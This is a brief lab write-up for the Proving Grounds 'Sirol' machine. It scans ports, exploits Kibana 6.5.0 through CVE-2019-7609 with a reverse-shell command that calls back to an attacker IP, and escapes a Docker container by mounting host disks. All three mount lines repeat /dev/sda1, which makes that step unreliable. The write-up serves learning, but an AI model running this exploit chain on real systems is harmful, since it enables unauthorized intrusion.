Sirol

Writeup for Sirol from offsec Proving Grounds

Information Gathering

rustscan -a 192.168.241.54 --ulimit 5000

nmap -sC -sV --reason -p22,80,3306,5601,24007 192.168.241.54

Service Enumeration

Kibana (Port 5601)

Under the Management tab, we can find the version number of Kibana that is running.

Exploit

Kibana Version 6.5.0 contains an arbitrary code execution flaw in the Timelion visualizer.

GitHub - LandGrey/CVE-2019-7609: exploit CVE-2019-7609(kibana RCE) on right way by python2 scriptsGitHub

Payload: python CVE-2019-7609-kibana-rce.py -u http://192.168.241.54:5601/ -host 192.168.49.241 -port 12345 --shell

Privesc

While we are already the root user, the root directory doesn't seem to have what we are looking for.

Notice that when we list the contents in the root directory, there is a .dockerenv file. This along with the fact that our hostname is a bunch of alphanumeric characters would likely indicate that we are in a docker container.

Using the command fdisk -l we can see what other disks are there.

We can then create a directory and mount all other disks.

mkdir /mnt/sda1
mkdir /mnt/sda2
mkdir /mnt/sda5

mount /dev/sda1 /mnt/sda1
mount /dev/sda1 /mnt/sda2
mount /dev/sda1 /mnt/sda5

PreviousLinux NextPeppo

Last updated 2 years ago